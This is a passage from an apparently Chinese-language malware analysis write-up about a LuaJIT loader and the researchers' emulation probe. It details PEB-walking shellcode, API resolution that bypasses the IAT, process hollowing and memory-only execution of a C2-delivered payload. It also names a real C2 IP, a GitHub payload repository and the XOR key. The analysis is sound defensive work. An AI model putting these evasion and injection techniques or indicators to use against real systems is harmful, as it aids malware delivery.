style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">NtUnmapViewOfSection</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">GetConsoleWindow</span></code><span leaf="">（含 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">SW_HIDE=0</span></code><span leaf=""> 隐藏窗口标志）等底层 API。随后，脚本分配可执行内存并写入以下 Shellcode，以获取 x64 架构下的</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">进程环境块（PEB）</span></strong><span leaf="">：</span></p><p style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">\x65\x48\x8b\x04\x25\x60\x00\x00\x00\xc3</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">; MOV RAX, GS:[</span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">x60]  ; 从线程信息块（TEB）偏移 </span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">x60 处读取 PEB 指针</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">; RET</span></p></code></pre></p><p data-line="234" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">获取 PEB 后，脚本遍历 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">PEB-&gt;Ldr-&gt;InMemoryOrderModuleList</span></code><span leaf=""> 双向链表，逐一比对模块名称，以此定位 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">kernel32.dll</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ntdll.dll</span></code><span leaf=""> 与 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">wininet.dll</span></code><span leaf=""> 的内存基址，并手动解析其导出表获取函数地址。这一手法完全绕过了 Windows 加载器的 IAT 机制，使得任何依赖 IAT Hook 的监控工具在此处彻底失效。</span></p><h4 data-line="236" style="margin: 2em 8px 0.5em;color: rgb(0, 82, 217);font-size: calc(17.6px);font-weight: bold;"><span leaf="">2.2 </span><code style="font-size: 15.84px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ffi.cast</span></code><span leaf=""> Hooking 与汇编热补丁</span></h4><p data-line="238" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">针对上述 PEB 劫持障碍，我们的绕过方案是在 LuaJIT 运行时内部实施汇编级拦截。在探针脚本中，我们深度劫持了原生的 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ffi.cast</span></code><span leaf=""> 函数。当检测到恶意脚本试图将包含 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">GS:[0x60]</span></code><span leaf=""> 机器码的缓冲区强转为函数指针时，探针触发</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">原地热补丁</span></strong><span leaf="">：</span></p><div style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><p style="text-align: right;padding: 4px 10px 2px;background: rgb(212, 218, 226);border-bottom: 1px solid rgb(200, 208, 219);"><span style="font-size: 11px;line-height: 1.4;color: rgb(58, 80, 112);font-family: &#34;Fira Code&#34;, Menlo, &#34;Operator Mono&#34;, Consolas, Monaco, monospace;letter-spacing: 0px;"><span leaf="">lua</span></span></p><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="lua" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(115, 129, 145);"><span leaf="">-- 检测 PEB Shellcode 特征码</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">local</span></span><span leaf=""> PEB_SHELLCODE </span><span style="color: rgb(76, 129, 201);"><span leaf="">=</span></span><span leaf=""> &#34;\x65\x48\x8b\x04\x25\x60\x00\x00\x00\xc3&#34;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">if ok </span><span style="color: rgb(0, 72, 171);"><span leaf="">and</span></span><span leaf=""> buf_bytes </span><span style="color: rgb(76, 129, 201);"><span leaf="">=</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">=</span></span><span leaf=""> PEB_SHELLCODE </span><span style="color: rgb(0, 72, 171);"><span leaf="">then</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">local</span></span><span leaf=""> peb_addr </span><span style="color: rgb(76, 129, 201);"><span leaf="">=</span></span><span leaf=""> fake_peb_addr</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    pcall(</span><span style="color: rgb(0, 72, 171);"><span leaf="">function</span></span><span leaf="">()</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">local</span></span><span leaf=""> p </span><span style="color: rgb(76, 129, 201);"><span leaf="">=</span></span><span leaf=""> old_cast(&#34;uint8_t*&#34;, addr)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(115, 129, 145);"><span leaf="">-- 将指令覆写为: MOV RAX, imm64 = 48 B8 &lt;8 bytes little-endian&gt;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(115, 129, 145);"><span leaf="">-- 此处覆写原始 GS:[0x60] 指令；内存哈希完整性检测在此失效</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">        p[</span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">] </span><span style="color: rgb(76, 129, 201);"><span leaf="">=</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">0x48</span></span><span leaf="">; p[</span><span style="color: rgb(76, 129, 201);"><span leaf="">1</span></span><span leaf="">] </span><span style="color: rgb(76, 129, 201);"><span leaf="">=</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">0xB8</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">for</span></span><span leaf=""> i </span><span style="color: rgb(76, 129, 201);"><span leaf="">=</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">, </span><span style="color: rgb(76, 129, 201);"><span leaf="">7</span></span><span leaf=""> do</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">            p[</span><span style="color: rgb(76, 129, 201);"><span leaf="">2</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">+</span></span><span leaf="">i] </span><span style="color: rgb(76, 129, 201);"><span leaf="">=</span></span><span leaf=""> bit.band(bit.rshift(peb_addr, i</span><span style="color: rgb(76, 129, 201);"><span leaf="">*</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">8</span></span><span leaf="">), </span><span style="color: rgb(76, 129, 201);"><span leaf="">0xFF</span></span><span leaf="">)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">end</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">        p[</span><span style="color: rgb(76, 129, 201);"><span leaf="">10</span></span><span leaf="">] </span><span style="color: rgb(76, 129, 201);"><span leaf="">=</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">0xC3</span></span><span style="color: rgb(115, 129, 145);"><span leaf="">-- RET</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">end</span></span><span leaf="">)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">end</span></span></p></code></pre></div><p data-line="259" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">这一底层操作在毫秒间将恶意软件的执行流劫持到了我们用 C 语言预先构造的假 PEB 结构体中。</span></p><h4 data-line="261" style="margin: 2em 8px 0.5em;color: rgb(0, 82, 217);font-size: calc(17.6px);font-weight: bold;"><span leaf="">2.3 内存伪造：假 PE 映像与 Ldr 代理</span></h4><p data-line="263" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">为了使劫持后的执行流不致崩溃，我们在 C 层（</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">fake_winapi.c</span></code><span leaf="">）构建了一个高度逼真的内存环境。</span></p><p data-line="265" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">PE 结构伪造</span></strong><span leaf="">：在分配的 64KB 可执行内存中，我们完整伪造了 DOS 头（MZ）、NT 头（PE\0\0）以及包含 44 个目标 API 的导出目录（Export Directory）：</span></p><div style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><p style="text-align: right;padding: 4px 10px 2px;background: rgb(212, 218, 226);border-bottom: 1px solid rgb(200, 208, 219);"><span style="font-size: 11px;line-height: 1.4;color: rgb(58, 80, 112);font-family: &#34;Fira Code&#34;, Menlo, &#34;Operator Mono&#34;, Consolas, Monaco, monospace;letter-spacing: 0px;"><span leaf="">c</span></span></p><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="c" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(115, 129, 145);"><span leaf="">// 截取自 fake_winapi.c / build_fake_pe_image()</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">FAKE_DOS_HEADER* dos = (FAKE_DOS_HEADER*)g_fake_pe_image;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">dos-&gt;e_magic  = </span><span style="color: rgb(76, 129, 201);"><span leaf="">0x5A4D</span></span><span leaf="">;  </span><span style="color: rgb(115, 129, 145);"><span leaf="">/* 写入 MZ 标志；仅需此8字节即可通过 IsValidPE() 类格式校验 */</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">dos-&gt;e_lfanew = </span><span style="color: rgb(76, 129, 201);"><span leaf="">0x80</span></span><span leaf="">;    </span><span style="color: rgb(115, 129, 145);"><span leaf="">/* 指向 NT 头偏移 */</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">FAKE_NT_HEADERS* nt = (FAKE_NT_HEADERS*)(g_fake_pe_image + </span><span style="color: rgb(76, 129, 201);"><span leaf="">0x80</span></span><span leaf="">);</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">nt-&gt;Signature = </span><span style="color: rgb(76, 129, 201);"><span leaf="">0x00004550</span></span><span leaf="">;  </span><span style="color: rgb(115, 129, 145);"><span leaf="">/* 写入 PE\0\0 标志 */</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">nt-&gt;OptionalHeader.DataDirectory[</span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">].VirtualAddress = </span><span style="color: rgb(76, 129, 201);"><span leaf="">0x200</span></span><span leaf="">; </span><span style="color: rgb(115, 129, 145);"><span leaf="">/* 导出目录 RVA */</span></span></p></code></pre></div><p data-line="278" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">Ldr 代理与动态 Trampoline</span></strong><span leaf="">：针对 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ntdll.dll</span></code><span leaf=""> 的 API 解析，我们对 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">LdrGetProcedureAddress</span></code><span leaf=""> 进行了 Mock。当恶意软件遍历假 PEB 并尝试解析导出表时，获取到的是我们布置的 RVA 偏移。当脚本尝试调用时（如 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ffi.cast(&#34;FARPROC&#34;, addr)</span></code><span leaf="">），探针通过偏移计算，精准将调用路由至 C 层代理函数，实现了无感监控。</span></p><div style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><p style="text-align: right;padding: 4px 10px 2px;background: rgb(212, 218, 226);border-bottom: 1px solid rgb(200, 208, 219);"><span style="font-size: 11px;line-height: 1.4;color: rgb(58, 80, 112);font-family: &#34;Fira Code&#34;, Menlo, &#34;Operator Mono&#34;, Consolas, Monaco, monospace;letter-spacing: 0px;"><span leaf="">c</span></span></p><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="c" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(115, 129, 145);"><span leaf="">// 截取自 fake_winapi.c / LdrCombinedStub()</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(115, 129, 145);"><span leaf="">// 为未知的导出函数动态生成 Trampoline </span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">uint8_t</span></span><span leaf="">* tramp = g_unknown_trampolines + (id * </span><span style="color: rgb(76, 129, 201);"><span leaf="">64</span></span><span leaf="">);</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">tramp[</span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">] = </span><span style="color: rgb(76, 129, 201);"><span leaf="">0xBF</span></span><span leaf="">; *(</span><span style="color: rgb(0, 72, 171);"><span leaf="">uint32_t</span></span><span leaf="">*)(tramp + </span><span style="color: rgb(76, 129, 201);"><span leaf="">1</span></span><span leaf="">) = id; </span><span style="color: rgb(115, 129, 145);"><span leaf="">/* MOV EDI, id */</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">tramp[</span><span style="color: rgb(76, 129, 201);"><span leaf="">5</span></span><span leaf="">] = </span><span style="color: rgb(76, 129, 201);"><span leaf="">0x48</span></span><span leaf="">; tramp[</span><span style="color: rgb(76, 129, 201);"><span leaf="">6</span></span><span leaf="">] = </span><span style="color: rgb(76, 129, 201);"><span leaf="">0xB8</span></span><span leaf="">;              </span><span style="color: rgb(115, 129, 145);"><span leaf="">/* MOV RAX, unknown_func_handler */</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(115, 129, 145);"><span leaf="">/* 每个未知导出函数获得独立64字节存根；规避基于函数地址固定性的检测 */</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">*(</span><span style="color: rgb(0, 72, 171);"><span leaf="">uintptr_t</span></span><span leaf="">*)(tramp + </span><span style="color: rgb(76, 129, 201);"><span leaf="">7</span></span><span leaf="">) = (</span><span style="color: rgb(0, 72, 171);"><span leaf="">uintptr_t</span></span><span leaf="">)unknown_func_handler;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">tramp[</span><span style="color: rgb(76, 129, 201);"><span leaf="">15</span></span><span leaf="">] = </span><span style="color: rgb(76, 129, 201);"><span leaf="">0xFF</span></span><span leaf="">; tramp[</span><span style="color: rgb(76, 129, 201);"><span leaf="">16</span></span><span leaf="">] = </span><span style="color: rgb(76, 129, 201);"><span leaf="">0xD0</span></span><span leaf="">;            </span><span style="color: rgb(115, 129, 145);"><span leaf="">/* CALL RAX */</span></span></p></code></pre></div><h4 data-line="291" style="margin: 2em 8px 0.5em;color: rgb(0, 82, 217);font-size: calc(17.6px);font-weight: bold;"><span leaf="">2.4 探针收获：上下文感知注入与 PE 镂空</span></h4><p data-line="293" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">三层仿真组件就位后，样本失去了所有的环境感知屏障，其真实意图在探针日志中完整呈现。</span></p><p data-line="295" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">PE 镂空（Process Hollowing）</span></strong><span leaf="">：我们监控到脚本通过假 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">VirtualAlloc</span></code><span leaf=""> 申请内存，并调用未文档化 API 试图掏空合法进程镜像以注入后续载荷，实现了规避磁盘扫描的无文件注入。</span></p><p data-line="297" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">上下文感知注入（Context-Aware Injection）</span></strong><span leaf="">：在网络通信阶段，C 层代理在 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">HttpSendRequestW</span></code><span leaf=""> 处实施了拦截。当样本向截获的 C2 端点 POST 发送收集到的多部分表单数据时，代理函数根据请求的上下文，强行注入了解密后的 297KB </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">热补丁代码</span></strong><span leaf="">：</span></p><div style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><p style="text-align: right;padding: 4px 10px 2px;background: rgb(212, 218, 226);border-bottom: 1px solid rgb(200, 208, 219);"><span style="font-size: 11px;line-height: 1.4;color: rgb(58, 80, 112);font-family: &#34;Fira Code&#34;, Menlo, &#34;Operator Mono&#34;, Consolas, Monaco, monospace;letter-spacing: 0px;"><span leaf="">c</span></span></p><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="c" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(115, 129, 145);"><span leaf="">// 截取自 fake_winapi.c / HttpSendRequestW()</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span leaf=""> (</span><span style="color: rgb(0, 72, 171);"><span leaf="">strstr</span></span><span leaf="">(g_w_server, </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;213.176.73.162&#34;</span></span><span leaf="">)) {</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(115, 129, 145);"><span leaf="">/* 拦截到向截图 C2 的请求，注入预期返回的热补丁代码 */</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(115, 129, 145);"><span leaf="">/* 响应注入发生在内存层，不触碰磁盘；绕过所有基于文件的 AV 扫描 */</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">printf</span></span><span leaf="">(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;[HttpSendRequestW] Injecting HOT-PATCH code (%zu bytes)\n&#34;</span></span><span leaf="">, g_fake_c2_response_len);</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span leaf=""> (g_response_buf) </span><span style="color: rgb(0, 72, 171);"><span leaf="">free</span></span><span leaf="">(g_response_buf);</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    g_response_len = g_fake_c2_response_len;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    g_response_buf = (</span><span style="color: rgb(0, 72, 171);"><span leaf="">char</span></span><span leaf="">*)</span><span style="color: rgb(0, 72, 171);"><span leaf="">malloc</span></span><span leaf="">(g_response_len + </span><span style="color: rgb(76, 129, 201);"><span leaf="">1</span></span><span leaf="">);</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">memcpy</span></span><span leaf="">(g_response_buf, g_fake_c2_response, g_response_len);</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">return</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">true</span></span><span leaf="">;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">}</span></p></code></pre></div><p data-line="313" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">通过这招&#34;移花接木&#34;，并监控原生 Lua 的 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">load</span></code><span leaf=""> 函数，探针自动 Dump 出了恶意软件被动态执行的后续逻辑。</span></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h3 data-line="317" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">阶段三：热补丁 — 双模式状态机与最终载荷</span></h3><p data-line="319" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">在阶段一的末尾，</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ptd.txt</span></code><span leaf=""> 通过 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">load(&#34;return &#34; .. hotpatch_code)</span></code><span leaf=""> 在内存中直接执行了 C2 返回的约 297KB Lua 代码——这段代码，就是热补丁的真身。它从未写入磁盘，整个执行过程对文件系统完全透明。</span></p><p data-line="321" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">为了对其进行静态分析，我们从 GitHub 载荷中转仓库（</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">github.com/Mahmudul-Riad/www</span></code><span leaf="">）手动下载了 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">index/7.txt</span></code><span leaf="">。这是一个 594KB 的 hex 编码加密 Blob，经 hex decode 后，以全局 XOR 密钥（</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ECe6VGLRJum2qYtl79OiOU7aHot7Zhbn</span></code><span leaf="">）解密，得到 297KB 的混淆 Lua 脚本，即分析中标记为 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">decrypted_7.bin</span></code><span leaf=""> 的文件。通过与 C2 实际下发内容的逐字节比对，我们确认两者完全一致——攻击者将热补丁同时托管在 GitHub 载荷中转仓库和 C2 服务器上：前者供研究员可见，作为静态分析的切入点；后者作为运行时动态注入的主通道，在受害者机器上不留任何文件痕迹。</span></p><p data-line="323" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">decrypted_7.bin</span></code><span leaf=""> 与 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ptd.txt</span></code><span leaf=""> 使用完全相同的自定义 VM 混淆框架（内层函数签名均为 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">return(function(...)local d=function(v)...</span></code><span leaf="">），说明两者出自同一工具链，但功能分工截然不同：</span></p><p style="max-width: 100%;overflow-x: auto;"><table style="border-collapse:separate;border-spacing:0px;border-radius:6px;margin:1em auto;color:rgb(51, 51, 51);box-shadow:none;border:1px solid rgb(208, 215, 227);min-width:262px;"><thead><tr><th data-colwidth="138" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: 